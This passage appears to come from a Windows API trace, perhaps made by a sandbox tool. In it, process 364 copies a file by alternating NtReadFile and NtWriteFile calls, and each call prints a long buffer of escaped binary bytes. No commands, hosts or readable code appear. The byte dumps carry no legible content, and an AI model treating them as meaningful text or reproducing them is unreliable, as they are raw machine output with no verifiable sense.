Buffer => \xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs\x92Te,\x9b\xe5\xb6mF\xd3p\xd4\xd5r\xd6l\x9bm\xd7\xd7\x07\xd8yJ\xd9\xdaI:\xdb\xd7u]\xd7\xdcF\xdd/\xde\x1b\xdf\x0f\xe0\x0b\xd34]]\xe1\x13\xe2L\xe3\xe4\xe5\xa8 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,618 | 364 | NtReadFile |
Buffer => \xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe\x90\xa4U\xb4\x9f \xdf
\x93V\x1c\x8dp
\x1a\x84\x1d\xa1l \x8bJ\x1d\xb7zZ\xa6i\x9a\xce\x17\x03\x88\x8f\x96\x9d\xe0Md\x9a\xa4\xab\xa6Wh\x0c'4H\xd5m\xca~\x04G FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,618 | 364 | NtWriteFile |
Buffer => \xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe\x90\xa4U\xb4\x9f \xdf
\x93V\x1c\x8dp
\x1a\x84\x1d\xa1l \x8bJ\x1d\xb7zZ\xa6i\x9a\xce\x17\x03\x88\x8f\x96\x9d\xe0Md\x9a\xa4\xab\xa6Wh\x0c'4H\xd5m\xca~\x04G FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,618 | 364 | NtReadFile |
Buffer => l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu^\xdc1"8\x02\xb7\x82\xc7\xd7\xff\xb1\x88\xaeW\xd5\xd8\x91\xcb{\xfeBR\x11\xbf2\xd9\x8b\xfd\xe9#\xc7P\x0c\x07&\xdezH\xc3m'hL\xe1V\x18_OP \xfaoS\xd1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,628 | 364 | NtWriteFile |
Buffer => l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu^\xdc1"8\x02\xb7\x82\xc7\xd7\xff\xb1\x88\xaeW\xd5\xd8\x91\xcb{\xfeBR\x11\xbf2\xd9\x8b\xfd\xe9#\xc7P\x0c\x07&\xdezH\xc3m'hL\xe1V\x18_OP \xfaoS\xd1 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,628 | 364 | NtReadFile |
Buffer => TW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P\x0f\xf4"\x88\x18N?\xfcf'W\xbe
\xceX\x91-'8\x9d'\x89#\xd4\xea\xfcp\xeb\xfd\xd69]\x8e\xc4\x17l7 \x90\xe8X\xeb\x18\xa2\x12\x94\xc0&<!rA\xc3
\x19 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,628 | 364 | NtWriteFile |
Buffer => TW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P\x0f\xf4"\x88\x18N?\xfcf'W\xbe
\xceX\x91-'8\x9d'\x89#\xd4\xea\xfcp\xeb\xfd\xd69]\x8e\xc4\x17l7 \x90\xe8X\xeb\x18\xa2\x12\x94\xc0&<!rA\xc3
\x19 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,628 | 364 | NtReadFile |
Buffer => 4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10\x10^\xd68\xf8\xb6\xc8D\xdfW\x1f\xd1&\xd8\x99\xac\x15\x92J\xfc\xb3\xe7#~\xbcHz\x82\x00\x14\xdc(\xd1d\x01{\xecr\x01\xdf\xec\xe9\xd2\xdcW\x9f8\xf0\xbc\x02\x8fz}\xe7> FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,628 | 364 | NtWriteFile |
Buffer => 4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10\x10^\xd68\xf8\xb6\xc8D\xdfW\x1f\xd1&\xd8\x99\xac\x15\x92J\xfc\xb3\xe7#~\xbcHz\x82\x00\x14\xdc(\xd1d\x01{\xecr\x01\xdf\xec\xe9\xd2\xdcW\x9f8\xf0\xbc\x02\x8fz}\xe7> FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,628 | 364 | NtReadFile |
Buffer => t,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+8+8\xcd%\x1c}\x80\xfc\xfe\x04\xa8\xceD`x\xb9M\x0e_\x9fT\xc2\x05\xb2\xff%\xf8{%\x00Ea\x86\x00\xb2\x00'\x8a",\x03\x88\x12\xa6i\x9a\xe6P\x00\x84\x80|xt FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,628 | 364 | NtWriteFile |
Buffer => t,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+8+8\xcd%\x1c}\x80\xfc\xfe\x04\xa8\xceD`x\xb9M\x0e_\x9fT\xc2\x05\xb2\xff%\xf8{%\x00Ea\x86\x00\xb2\x00'\x8a",\x03\x88\x12\xa6i\x9a\xe6P\x00\x84\x80|xt FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,628 | 364 | NtReadFile |
Buffer => \x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd\xff\xc0\xad}Dv\x12\x17\x16+a\x18r\x81\xf7\x19\xb1\xcc\xfc\xf9\xbc{r\x9a\xb2\xea\x87\xc4t\xb7\xff\xff\xff\xbfH@Gv\xb8>\x1a9r\x0f\xc1dA\xca\x87\x12j\x86\x11\xcc\xc5 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,628 | 364 | NtWriteFile |
Buffer => \x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd\xff\xc0\xad}Dv\x12\x17\x16+a\x18r\x81\xf7\x19\xb1\xcc\xfc\xf9\xbc{r\x9a\xb2\xea\x87\xc4t\xb7\xff\xff\xff\xbfH@Gv\xb8>\x1a9r\x0f\xc1dA\xca\x87\x12j\x86\x11\xcc\xc5 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,628 | 364 | NtReadFile |
Buffer => \x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9`\x85m\x82\xb0.'\xf78S|\x18\x18\xf8\x05\xfe_\x0f\xb1\xc4~\x03\xb4e\x12\xca\x1cI\x17\xf5\xcaq\x17\xad\xcf\xdf\xf8\xff\x17E\x8c\xbe2MISY\xca\xb9\xca\xc4\xbe=\xaa\xe7_ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,658 | 364 | NtWriteFile |
Buffer => \x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9`\x85m\x82\xb0.'\xf78S|\x18\x18\xf8\x05\xfe_\x0f\xb1\xc4~\x03\xb4e\x12\xca\x1cI\x17\xf5\xcaq\x17\xad\xcf\xdf\xf8\xff\x17E\x8c\xbe2MISY\xca\xb9\xca\xc4\xbe=\xaa\xe7_ FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,658 | 364 | NtReadFile |
Buffer => \x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3\x8a$\x8d\x1d\x8c\x0c\x8f,\x96m\xff\xff\xff\xff\xd6(\x8e"\x91\x90n\x932v\x8a\xef(\xdb\x92\x95\x94\x97f\x96\x16\x99\x1c\xf2\x9dw\x98/^\x9b%\x9a\xc0\x0b\xff\xff\x9d\x0e\x9c\x8c3 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,658 | 364 | NtWriteFile |
Buffer => \x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3\x8a$\x8d\x1d\x8c\x0c\x8f,\x96m\xff\xff\xff\xff\xd6(\x8e"\x91\x90n\x932v\x8a\xef(\xdb\x92\x95\x94\x97f\x96\x16\x99\x1c\xf2\x9dw\x98/^\x9b%\x9a\xc0\x0b\xff\xff\x9d\x0e\x9c\x8c3 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,658 | 364 | NtReadFile |
Buffer => \xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE\xcc\xf3\xea\xea\xbeO\x1e\x0ba
\xac \x06\xc7\xff\x7f\xab\x7f\xba\xe1\xfa\x91Cy\xbf\xb9\xf8f\xea\xd7\xfc\xc7*P;9u;\x109\xa1\xff\xff\xff\xadi\x10\xf5UF\x18\x0b\xb5\x08\xac FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,658 | 364 | NtWriteFile |
Buffer => \xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE\xcc\xf3\xea\xea\xbeO\x1e\x0ba
\xac \x06\xc7\xff\x7f\xab\x7f\xba\xe1\xfa\x91Cy\xbf\xb9\xf8f\xea\xd7\xfc\xc7*P;9u;\x109\xa1\xff\xff\xff\xadi\x10\xf5UF\x18\x0b\xb5\x08\xac FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,658 | 364 | NtReadFile |
Buffer => y)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8Z\x88Z6K\xb6\xbe\xb8aX\x00B\x8bu\xc9O\x07\xc9\xff\xff\xbf\xc4\xa1b\x1d\x85N\xbe\xbbM4\xf8\xbd\x17\xd0\xd9\xb1-%\x19\x82\xf2\x11\xc2\xfe\x05\xff\xff/\xf5\x9aUABz FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,658 | 364 | NtWriteFile |
Buffer => y)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8Z\x88Z6K\xb6\xbe\xb8aX\x00B\x8bu\xc9O\x07\xc9\xff\xff\xbf\xc4\xa1b\x1d\x85N\xbe\xbbM4\xf8\xbd\x17\xd0\xd9\xb1-%\x19\x82\xf2\x11\xc2\xfe\x05\xff\xff/\xf5\x9aUABz FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,658 | 364 | NtReadFile |
